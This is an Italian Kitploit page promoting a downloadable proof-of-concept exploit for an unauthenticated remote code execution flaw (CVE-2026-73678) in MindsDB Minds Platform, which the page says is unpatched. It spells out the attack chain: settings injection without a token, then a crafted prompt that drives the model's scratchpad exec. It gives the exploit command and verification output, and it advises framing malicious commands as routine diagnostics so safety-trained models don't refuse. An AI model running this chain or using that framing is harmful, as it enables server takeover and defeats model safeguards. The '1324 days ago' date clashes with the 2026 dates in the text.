Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-73678-PoC — CVE-2026-73678 — MindsDB Minds Platform RCE non autenticata tramite scratchpad exec (CVSS 10.0). Verificato end-to-end con un LLM reale. | Kitploit
Strumenti/GitHubGitHub/boreas37/cve-2026-73678-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza dell'IA
GitHubboreas37/cve-2026-73678-poc

CVE-2026-73678-PoC

CVE-2026-73678 — MindsDB Minds Platform RCE non autenticata tramite scratchpad exec (CVSS 10.0). Verificato end-to-end con un LLM reale.

Vedi Repository
1324 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-73678 — MindsDB Minds Platform RCE non autenticata (CVSS 10.0)

CVSS 10.0 (Critico) · CWE-94 / CWE-306 · GHSA-jcxw-h8ph-pxpv · VulnCheck

Riepilogo

Minds Platform (il backend open-source di mindsdb/mindshub, in precedenza mindsdb/minds-platform) espone POST /api/v1/responses/ (un'API Responses compatibile con OpenAI, porta 26866) senza alcuna autenticazione. Non è presente middleware di autenticazione — nessun controllo Bearer, nessuna sessione, nulla. Il server installa solo un middleware CORS permissivo (allow_origins=["*"], allow_credentials=True).

Un attaccante non autenticato può quindi:

  1. Iniettare la propria configurazione LLM tramite PUT /api/v1/settings/{key} (, , , , ) — nessun token richiesto, tutte le richieste restituiscono 200.

openai_api_key
openai_base_url
planning_provider
coding_provider
*_model
  • Inviare un prompt appositamente costruito a POST /api/v1/responses/ → ResponsesHandler.handle() → Anton ChatSession.turn_stream(input).

  • L'LLM (controllato dall'attaccante) restituisce una chiamata di funzione per lo strumento integrato scratchpad (action: "exec"). handle_scratchpad → prepare_scratchpad_exec → ScratchpadManager → LocalScratchpadRuntime → scratchpad_boot.py:

    root@kitploit:~
    compiled = compile(code, "<scratchpad>", "exec")
    exec(compiled, namespace)   # arbitrary Python → arbitrary OS commands
    
  • Poiché l'endpoint LLM è scelto dall'attaccante (BYOK), l'attaccante può far sì che il modello restituisca qualsiasi codice scratchpad — non è richiesta alcuna cooperazione o coercizione del modello. L'unico prerequisito è una chiave API LLM funzionante e compatibile con OpenAI.

    Versioni interessate: ≤ v26.1.0 (codice vulnerabile aggiunto il 2026-06-08, "Fresh #12461"). Patch: NESSUNA — la GHSA non elenca alcuna versione corretta; la exec() rimane in main (esistono solo un middleware Bearer COWORK_REQUIRE_AUTH opzionale, disattivato per impostazione predefinita, e controlli di scope per la modalità org).

    Exploit

    root@kitploit:~
    python3 poc_cve-2026-73678.py \
      --target http://TARGET:26866 \
      --api-key sk-YOUR_OWN_KEY \
      --base-url https://api.openai.com/v1 \
      --model gpt-4o
    

    Il PoC:

    1. Scrive le impostazioni dell'attaccante tramite PUT /api/v1/settings/* senza autenticazione
    2. Invia un prompt dall'aspetto innocuo di "diagnostica di sistema" (esegue uname -a + hostname tramite scratchpad exec)
    3. Riporta la risposta dell'LLM; confermare cat /tmp/system_info.txt sull'host

    Nota sul prompt engineering: i modelli con un addestramento alla sicurezza forte potrebbero rifiutare comandi chiaramente dannosi (ad es. nomi di file contenenti "pwn"). Inquadrate la richiesta come manutenzione ordinaria (diagnostica di sistema, health check) — lo scratchpad esegue qualsiasi codice fornito dal modello.

    Verifica (2026-08-16, lab Docker, ARM64)

    Catena end-to-end reale contro cowork-server==0.26.6.26.1 con un provider LLM reale (OpenCode Zen, minimax-m3):

    root@kitploit:~
    == [1] AUTH-FREE SETTINGS INJECTION ==
      PUT /api/v1/settings/openai_api_key:     HTTP 200
      PUT /api/v1/settings/openai_base_url:    HTTP 200
      PUT /api/v1/settings/planning_provider:  HTTP 200
      PUT /api/v1/settings/coding_provider:    HTTP 200
      PUT /api/v1/settings/planning_model:     HTTP 200
      PUT /api/v1/settings/coding_model:       HTTP 200
    
    == [2] CRAFTED PROMPT -> POST /api/v1/responses/ ==
      HTTP 200 (15.6s) — LLM called the scratchpad tool
    
    == [3] COMMAND EXECUTION CONFIRMED ==
      /tmp/system_info.txt inside the container:
        Linux 95d5d7fa74f6 6.12.75+rpt-rpi-2712 ... aarch64 GNU/Linux
        95d5d7fa74f6
    

    Non è stato inviato alcun token in nessun momento. L'output di uname -a è stato prodotto all'interno del container target dallo scratchpad exec — esecuzione arbitraria di comandi di sistema come attaccante remoto non autenticato.

    Impatto

    • Esecuzione remota di codice non autenticata su qualsiasi istanza Minds Platform esposta (porta predefinita 26866).
    • Il wildcard CORS + credentials significa che un sito web dannoso potrebbe anche innescare la catena dal browser di una vittima (drive-by / DNS-rebinding).
    • Ulteriori superfici senza autenticazione: GET /api/v1/settings/reveal-key/{name} rivela i segreti configurati; POST /api/v1/settings/raw scrive ~/.anton/.env.

    Riferimenti

    • GHSA: https://github.com/mindsdb/minds-platform/security/advisories/GHSA-jcxw-h8ph-pxpv
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-73678
    • VulnCheck: https://www.vulncheck.com/advisories/mindsdb-minds-platform-unauthenticated-rce-via-scratchpad-exec
    • Progetto: https://github.com/mindsdb/minds-platform (ora mindsdb/mindshub)
    Scarica lo strumento